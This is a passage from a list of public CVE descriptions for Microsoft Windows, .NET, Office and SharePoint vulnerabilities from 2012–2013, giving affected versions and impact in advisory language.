Vulnerability." [CVE-2013-1287] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1286. [CVE-2013-1286] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1287. [CVE-2013-1285] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1286 and CVE-2013-1287. [CVE-2013-1283] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1281] The NFS server in Microsoft Windows Server 2008 R2 and R2 SP1 and Server 2012 allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via an attempted renaming of a file or folder located on a read-only share, aka "NULL Dereference Vulnerability." [CVE-2013-1280] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Reference Count Vulnerability." [CVE-2013-1279] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1278. [CVE-2013-1278] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1279. [CVE-2013-1277] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1276] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1275] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1274] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1273] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1272] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1271] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1270] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1269] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1268] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1267] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1266] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1265] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1264] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1263] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1262] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1261] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1260] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1259] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1258] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1257] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1256] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1255] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1254] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1253] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1252] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1251] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1250] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1249] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1248] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-0095] Outlook in Microsoft Office for Mac 2008 before 12.3.6 and Office for Mac 2011 before 14.3.2 allows remote attackers to trigger access to a remote URL and consequently confirm the rendering of an HTML e-mail message by including unspecified HTML5 elements and leveraging the installation of a WebKit browser on the victim's machine, aka "Unintended Content Loading Vulnerability." [CVE-2013-0077] Quartz.dll in DirectShow in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via crafted media content in (1) a media file, (2) a media stream, or (3) a Microsoft Office document, aka "Media Decompression Vulnerability." [CVE-2013-0076] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Reference Count Vulnerability." [CVE-2013-0075] The TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (reboot) via a crafted packet that terminates a TCP connection, aka "TCP FIN WAIT Vulnerability." [CVE-2013-0073] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly restrict the privileges of a callback function during object creation, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "WinForms Callback Elevation Vulnerability." [CVE-2013-0013] The SSL provider component in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle encrypted packets, which allows man-in-the-middle attackers to conduct SSLv2 downgrade attacks against (1) SSLv3 sessions or (2) TLS sessions by intercepting handshakes and injecting content, aka "Microsoft SSL Version 3 and TLS Protocol Security Feature Bypass Vulnerability." [CVE-2013-0011] The Print Spooler in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted print job, aka "Windows Print Spooler Components Vulnerability." [CVE-2013-0010] Cross-site scripting (XSS) vulnerability in Microsoft System Center Operations Manager 2007 SP1 and R2 allows remote attackers to inject arbitrary web script or HTML via crafted input, aka "System Center Operations Manager Web Console XSS Vulnerability," a different vulnerability than CVE-2013-0009. [CVE-2013-0009] Cross-site scripting (XSS) vulnerability in Microsoft System Center Operations Manager 2007 SP1 and R2 allows remote attackers to inject arbitrary web script or HTML via crafted input, aka "System Center Operations Manager Web Console XSS Vulnerability," a different vulnerability than CVE-2013-0010. [CVE-2013-0008] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability." [CVE-2013-0004] Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly validate the permissions of objects in memory, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "Double Construction Vulnerability." [CVE-2013-0003] Buffer overflow in a System.DirectoryServices.Protocols (S.DS.P) namespace method in Microsoft .NET Framework 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a missing array-size check during a memory copy operation, aka "S.DS.P Buffer Overflow Vulnerability." [CVE-2013-0002] Buffer overflow in the Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages improper counting of objects during a memory copy operation, aka "WinForms Buffer Overflow Vulnerability." [CVE-2013-0001] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 4, and 4.5 does not properly initialize memory arrays, which allows remote attackers to obtain sensitive information via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a pointer to an unmanaged memory location, aka "System Drawing Information Disclosure Vulnerability." [CVE-2012-5672] Microsoft Excel Viewer (aka Xlview.exe) and Excel in Microsoft Office 2007 (aka Office 12) allow remote attackers to cause a denial of service (read access violation and application crash) via a crafted spreadsheet file, as demonstrated by a .xls file with battery voltage data. [CVE-2012-4791] Microsoft Exchange Server 2007 SP3 and 2010 SP1 and SP2 allows remote authenticated users to cause a denial of service (Information Store service hang) by subscribing to a crafted RSS feed, aka "RSS Feed May Cause Exchange DoS Vulnerability." [CVE-2012-4786] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allow remote attackers to execute arbitrary code via a crafted TrueType Font (TTF) file, aka "TrueType Font Parsing Vulnerability." [CVE-2012-4776] The Web Proxy Auto-Discovery (WPAD) functionality in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not validate configuration data that is returned during acquisition of proxy settings, which allows remote attackers to execute arbitrary JavaScript code by providing crafted data during execution of (1) an XAML browser application (aka XBAP) or (2) a .NET Framework application, aka "Web Proxy Auto-Discovery Vulnerability." [CVE-2012-4774] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via a crafted (1) file name or (2) subfolder name that triggers use of unallocated memory as the destination of a copy operation, aka "Windows Filename Parsing Vulnerability." [CVE-2012-2897] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT, as used by Google Chrome before 22.0.1229.79 and other programs, do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a crafted TrueType font file, aka "Windows Font Parsing Vulnerability" or "TrueType Font Parsing Vulnerability." [CVE-2012-2556] The OpenType Font (OTF) driver in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to execute arbitrary code via a crafted OpenType font file, aka "OpenType Font Parsing Vulnerability." [CVE-2012-2553] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2552] Cross-site scripting (XSS) vulnerability in the SQL Server Report Manager in Microsoft SQL Server 2000 Reporting Services SP2 and SQL Server 2005 SP4, 2008 SP2 and SP3, 2008 R2 SP1, and 2012 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Reflected XSS Vulnerability." [CVE-2012-2551] The server in Kerberos in Microsoft Windows Server 2008 R2 and R2 SP1, and Windows 7 Gold and SP1, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted session request, aka "Kerberos NULL Dereference Vulnerability." [CVE-2012-2543] Stack-based buffer overflow in Microsoft Excel 2007 SP2 and SP3 and 2010 SP1 [CVE-2012-2539] Microsoft Word 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-2536] Cross-site scripting (XSS) vulnerability in Microsoft Systems Management Server 2003 SP3 and System Center Configuration Manager 2007 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Reflected XSS Vulnerability." [CVE-2012-2530] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2529] Integer overflow in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Windows Kernel Integer Overflow Vulnerability." [CVE-2012-2528] Use-after-free vulnerability in Microsoft Word 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-2527] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2524] Microsoft Office 2007 SP2 and SP3 and 2010 SP1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Computer Graphics Metafile (CGM) file, aka "CGM File Format Memory Corruption Vulnerability." [CVE-2012-2520] Cross-site scripting (XSS) vulnerability in Microsoft InfoPath 2007 SP2 and SP3 and 2010 SP1, Communicator 2007 R2, Lync 2010 and 2010 Attendee, SharePoint Server 2007 SP2 and SP3 and 2010 SP1, Groove Server 2010 SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability." [CVE-2012-2519] Untrusted search path vulnerability in Entity Framework in ADO.NET in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, and 4 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .NET application, aka ".NET Framework Insecure Library Loading Vulnerability." [CVE-2012-1896] Microsoft .NET Framework 2.0 SP2 and 3.5.1 does not properly consider trust levels during construction of output data, which allows remote attackers to obtain sensitive information via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka "Code Access Security Info Disclosure Vulnerability." [CVE-2012-1895] The reflection implementation in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.5.1, and 4 does not properly enforce object permissions, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka "Reflection Bypass Vulnerability." [CVE-2012-1893] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate callback parameters during creation of a hook procedure, which allows local users to gain privileges via a crafted application, aka "Win32k Incorrect Type Handling Vulnerability." [CVE-2012-1890] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle keyboard-layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout Vulnerability." [CVE-2012-1887] Use-after-free vulnerability in Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 SP1, and Office 2008 and 2011 for Mac, allows remote attackers to execute arbitrary code via a crafted spreadsheet, aka "Excel SST Invalid Length Use After Free Vulnerability." [CVE-2012-1886] Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-1885] Heap-based buffer overflow in Microsoft Excel 2003 SP3, 2007 SP2 and SP3, and 2010 SP1 [CVE-2012-1870] The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and other products, allows remote web servers to obtain plaintext data by triggering multiple requests to a third-party HTTPS server and sniffing the network during the resulting HTTPS session, aka "TLS Protocol Vulnerability." [CVE-2012-1867] Integer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted TrueType font file that triggers incorrect memory allocation, aka "Font Resource Refcount Integer Overflow Vulnerability." [CVE-2012-1866] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "Clipboard Format Atom Name Handling Vulnerability." [CVE-2012-1865] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1864. [CVE-2012-1864] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1865. [CVE-2012-1863] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Reflected List Parameter Vulnerability." [CVE-2012-1862] Open redirect vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka "SharePoint URL Redirection Vulnerability." [CVE-2012-1860] Microsoft Office SharePoint Server 2007 SP2 and SP3, SharePoint Server 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 do not properly check permissions for search scopes, which allows remote authenticated users to obtain sensitive information or cause a denial of service (data modification) by changing a parameter in a search-scope URL, aka "SharePoint Search Scope Vulnerability." [CVE-2012-1858] The toStaticHTML API (aka the SafeHTML component) in Microsoft Internet Explorer 8 and 9, Communicator 2007 R2, and Lync 2010 and 2010 Attendee does not properly handle event attributes and script, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via a crafted HTML document, aka "HTML Sanitization Vulnerability." [CVE-2012-1856] The TabStrip ActiveX control in the Common Controls in MSCOMCTL.OCX in Microsoft Office 2003 SP3, Office 2003 Web Components SP3, Office 2007 SP2 and SP3, Office 2010 SP1, SQL Server 2000 SP4, SQL Server 2005 SP4, SQL Server 2008 SP2, SP3, R2, R2 SP1, and R2 SP2, Commerce Server 2002 SP4, Commerce Server 2007 SP2, Commerce Server 2009 Gold and R2, Host Integration Server 2004 SP1, Visual FoxPro 8.0 SP1, Visual FoxPro 9.0 SP2, and Visual Basic 6.0 Runtime allows remote attackers to execute arbitrary code via a crafted (1) document or (2) web page that triggers system-state corruption, aka "MSCOMCTL.OCX RCE Vulnerability." [CVE-2012-1855] Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly handle function pointers, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP) or (2) a crafted .NET Framework application, aka ".NET Framework Memory Access Vulnerability." [CVE-2012-1854] Untrusted search path vulnerability in VBE6.dll in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1 [CVE-2012-1851] Format string vulnerability in the Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted response, aka "Print Spooler Service Format String 